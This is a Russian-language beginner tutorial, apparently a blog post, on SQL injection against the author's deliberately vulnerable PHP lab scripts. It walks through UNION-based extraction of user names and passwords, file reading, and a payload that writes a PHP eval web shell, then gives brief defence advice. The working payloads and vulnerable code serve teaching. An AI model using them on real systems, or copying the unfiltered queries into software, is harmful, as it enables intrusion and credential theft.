<h1>SQL инъекции. Проверка, взлом, защита</h1>
Приветствую тебя, читатель. Последнее время, я увлекаюсь Web-безопасностью, да и в какой-то степени работа связана с этим. Т.к. я всё чаще и чаще стал замечать темы на различных форумах, с просьбой показать, как это всё работает, решил написать статью. Статья будет рассчитана на тех, кто не сталкивался с подобным, но хотел бы научиться. В сети относительно много статей на данную тематику, но для начинающих они немного сложные. Я постараюсь описать всё понятным языком и подробными примерами.<br>
<a name="habracut"></a><br>
<br>
<h4><font color="#2e47ff">Предисловие</font></h4>
Для того, чтобы понять данную статью, вам не особо понадобится знания SQL-языка, а хотя бы наличие хорошего терпения и немного мозгов — для запоминания.<br>
<br>
Я считаю, что одного прочтения статьи будет мало, т.к. нам нужны живые примеры — как известно практика, в процессе запоминания, не бывает лишней. Поэтому мы будем писать уязвимые скрипты и тренироваться на них.<br>
<br>
<h5><font color="#bd7d00">Что же такое SQL инъекция?</font></h5>
Говоря простым языком — это атака на базу данных, которая позволит выполнить некоторое действие, которое не планировалось создателем скрипта. Пример из жизни:<br>
<br>
Отец, написал в записке маме, чтобы она дала Васе 100 рублей и положил её на стол. Переработав это в шуточный SQL язык, мы получим:<br>
<code>ДОСТАНЬ ИЗ кошелька 100 РУБЛЕЙ И ДАЙ ИХ Васе<br>
</code><br>
Так-как отец плохо написал записку (Корявый почерк), и оставил её на столе, её увидел брат Васи — Петя. Петя, будучи хакер, дописал там «ИЛИ Пете» и получился такой запрос:<br>
<code>ДОСТАНЬ ИЗ кошелька 100 РУБЛЕЙ И ДАЙ ИХ Васе ИЛИ Пете<br>
</code><br>
Мама прочитав записку, решила, что Васе она давала деньги вчера и дала 100 рублей Пете. Вот простой пример SQL инъекции из жизни :) Не фильтруя данные (Мама еле разобрала почерк), Петя добился профита.<br>
<br>
<h5><font color="#bd7d00">Подготовка</font></h5>
Для практики, Вам понадобится <a href="">архив с исходными скриптами</a> данной статьи. Скачайте его и распакуйте на сервере. Также импортируйте базу данных и установите данные в файле <b>cfg.php</b><br>
<br>
<h4><font color="#2e47ff">Поиск SQL injection</font></h4>
Как Вы уже поняли, инъекция появляется из входящих данных, которые не фильтруются. Самая распространенная ошибка — это не фильтрация передаваемого ID. Ну грубо говоря подставлять во все поля кавычки. Будь это GET/POST запрос и даже Cookie!<br>
<hr>
<h5><font color="#bd7d00">Числовой входящий параметр</font></h5>
Для практики нам понадобится скрипт <b>index1.php</b>. Как я уже говорил выше, подставляем кавычки в ID новости.<br>
<pre>sqlinj/index1.php?id=1<font color="#ff0000">'</font></pre>
Т.к. у нас запрос не имеет фильтрации:<br>
<pre><code class="php hljs">$id = $_GET[<span>'id'</span>];
$query = <span>"SELECT * FROM news WHERE id=$id"</span>;
</code></pre>
Скрипт поймет это как <br>
<pre>SELECT * FROM news WHERE id=1<font color="#ff0000">'</font></pre>
И выдаст нам ошибку:<br>
<b>Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\WebServ\domains\sqlinj\index1.php on line 16</b><br>
<br>
Если ошибку не выдало — могут быть следующие причины:<br>
<br>
1.SQL инъекции здесь нет — Фильтруются кавычки, или просто стоит преобразование в <b>(int)</b><br>
2.Отключен вывод ошибок.<br>
<br>
Если все же ошибку вывело — Ура! Мы нашли первый вид SQL инъекции — Числовой входящий параметр.<br>
<hr>
<h5><font color="#bd7d00">Строковой входящий параметр</font></h5>
Запросы будем посылать на <b>index2.php</b>. В данном файле, запрос имеет вид:<br>
<pre><code class="php hljs">$user = $_GET[<span class="hljs-string"><span class="hljs-string">'user'</span></span>];
$query = <span class="hljs-string"><span class="hljs-string">"SELECT * FROM news WHERE user='$user'"</span></span>;
</code></pre>
Тут мы делаем выборку новости по имени пользователя, и опять же — не фильтруем. <br>
Опять посылаем запрос с кавычкой:<br>
<pre>sqlinj/index2.php?user=AlexanderPHP<font color="#ff0000">'</font></pre>
Выдало ошибку. Ок! Значит уязвимость есть. Для начала нам хватит — приступим к практике.
<hr>
<h4><font color="#2e47ff">Приступаем к действиям</font></h4>
<h5><font color="#bd7d00">Немного теории</font></h5>
Наверно Вам уже не терпится извлечь что-то из этого, кроме ошибок. Для начала усвойте, что знак "<b> <code>--</code> </b>" считается комментарием в языке SQL.<br>
<br>
ВНИМАНИЕ! Перед и после него обязательно должны стоять пробелы. В URL они передаются как <b>%20</b><br>
<br>
Всё, что идет после комментария — будет отброшено То есть запрос:<br>
<code>SELECT * FROM news WHERE user='AlexanderPHP' -- habrahabra</code><br>
<br>
Выполнится удачно. Можете попробовать это на скрипте index2.php, послав такой запрос:<br>
<br>
<code><a href=""></a>sqlinj/index2.php?user=AlexanderPHP'%20--%20habrahabr</code><br>
<hr>
Выучите параметр <b>UNION</b>. В языке SQL ключевое слово <b>UNION</b> применяется для объединения результатов двух SQL-запросов в единую таблицу. То есть для того, чтобы вытащить что-то нам нужное из другой таблицы.
<hr>
<h5><font color="#bd7d00">Извлекаем из этого пользу</font></h5>
Если параметр «Числовой», то в запросе нам не нужно посылать кавычку и естественно ставить комментарий в конце. Вернемся к скрипту <b>index1.php</b>.<br>
<br>
Обратимся к скрипту <code><a href=""></a>sqlinj/index1.php?id=1 UNION SELECT 1</code>. Запрос к БД у нас получается вот таким: <br>
<code>SELECT * FROM news WHERE id=1 UNION SELECT 1</code><br>
И он выдал нам ошибку, т.к. для работы с объедением запросов, нам требуется одинаковое количество полей. <br>
<br>
Т.к. мы не можем повлиять на их количество в первом запросе, то нам нужно подобрать их количество во втором, чтобы оно было равно первому.<br>
<br>
<h6><font color="#00aace">Подбираем количество полей</font></h6>
Подбор полей делается очень просто, достаточно посылать такие запросы:<br>
<code><a href=""></a>sqlinj/index1.php?id=1 UNION SELECT 1,2</code><br>
Ошибка…<br>
<code><a href=""></a>sqlinj/index1.php?id=1 UNION SELECT 1,2,3</code><br>
Опять ошибка!<br>
<code><a href=""></a>sqlinj/index1.php?id=1 UNION SELECT 1,2,3,4,5</code><br>
Ошибки нет! Значит количество столбцов равно 5.<br>
<br>
<h6><font color="#93b200">GROUP BY</font></h6>
Зачастую бывает, что полей может быть 20 или 40 или даже 60. Чтобы нам каждый раз не перебирать их, используем <b>GROUP BY</b><br>
<br>
Если запрос <br>
<code><a href=""></a>sqlinj/index1.php?id=1 GROUP BY 2</code> <br>
не выдал ошибок, значит кол-во полей больше 2. Пробуем:<br>
<br>
<code><a href=""></a>sqlinj/index1.php?id=1 GROUP BY 8</code><br>
Оп, видим ошибку, значит кол-во полей меньше 8.<br>
<br>
Если при GROUP BY 4 нет ошибки, а при GROUP BY 6 — ошибка, Значит кол-во полей равно 5
<hr>
<h5><font color="#bd7d00">Определение выводимых столбцов</font></h5>
Для того, чтобы с первого запроса нам ничего не выводилось, достаточно подставить несуществующий ID, например: <br>
<br>
<code><a href=""></a>sqlinj/index1.php?id=-1 UNION SELECT 1,2,3,4,5</code><br>
<br>
<img src="/articles/images/1342786985.jpeg" alt="image"><br>
Этим действием, мы определили, какие столбцы выводятся на страницу. теперь, чтобы заменить эти цифры на нужную информацию, нужно продолжить запрос.<br>
<hr><br>
<h4><font color="#2e47ff">Вывод данных</font></h4>
Допустим мы знаем, что еще существует таблица <b>users</b> в которой существуют поля <b>id</b>, <b>name</b> и <b>pass</b>.<br>
Нам нужно достать Информацию о пользователе с ID=1<br>
<br>
Следовательно построим такой запрос:<br>
<br>
<code><a href=""></a>sqlinj/index1.php?id=-1 UNION SELECT 1,2,3,4,5 FROM users WHERE id=1</code><br>
Скрипт также продолжает выводить <br>
<img src="/articles/images/1342786985.jpeg" alt="image"><br>
<br>
Для этого, мы подставим название полей, за место цифр 1 и 3<br>
<br>
<code><a href=""></a>sqlinj/index1.php?id=-1 UNION SELECT name,2,pass,4,5 FROM users WHERE id=1</code><br>
Получили то — что требовалось!<br>
<img src="/articles/images/1342787397.jpeg" alt="image"><br>
<br>
<hr><br>
Для «строкового входящего параметра», как в скрипте <b>index2.php</b> нужно добавлять кавычку в начале и знак комментария в конце. Пример:<br>
<code><a href=""></a>sqlinj/index2.php?user=-1' UNION SELECT name,2,pass,4,5 FROM users WHERE id=1 --%20</code><br>
<hr>
<h4><font color="#2e47ff">Чтение/Запись файлов</font></h4>
Для чтения и записи файлов, у пользователя БД должны быть права FILE_PRIV.<br>
<br>
<h5><font color="#bd7d00">Запись файлов</font></h5>
На самом деле всё очень просто. Для записи файла, мы будем использовать функцию <b>OUTFILE </b>.<br>
<code><a href=""></a>sqlinj/index2.php?user=-1' UNION SELECT 1,2,3,4,5 INTO OUTFILE '1.php' --%20</code><br>
Отлично, файл у нас записался. Таким образом, Мы можем залить мини-шелл:<br>
<code><a href=""></a>sqlinj/index2.php?user=-1' UNION SELECT 1,'&lt;?php eval($_GET[1]) ?&gt;',3,4,5 INTO OUTFILE '1.php' --%20</code><br>
<hr>
<h5><font color="#bd7d00">Чтение файлов</font></h5>
Чтение файлов производится еще легче, чем запись. Достаточно просто использовать функцию <b>LOAD_FILE</b>, за место того поля, которое мы выбираем:
<code><a href=""></a>sqlinj/index2.php?user=-1' UNION SELECT 1,LOAD_FILE('1.php'),3,4,5 --%20</code><br>
<br>
Таким образом, мы прочитали предыдущий записанный файл.<br>
<hr>
<h4><font color="#2e47ff">Способы защиты</font></h4>
Защититься еще проще, чем использовать уязвимость. Просто фильтруйте данные. Если Вы передаёте числа, используйте<br>
<pre><code class="php hljs">$id = (int) $_GET[<span class="hljs-string"><span class="hljs-string">'id'</span></span>];
</code></pre>
Как подсказал пользователь <a href="" class="user_link">malroc</a>. Защищаться использованием PDO или prepared statements.
<hr>
<h4><font color="#2e47ff">Вместо завершения</font></h4>
На этом хочу закончить свою первую часть про «SQL injection для начинающих». Во второй мы рассмотрим более тяжелые примеры инъекций. Пробуйте сами писать уязвимые скрипты и выполнять запросы.
И запомните, не доверяйте ни одному пользователю Вашего сайта.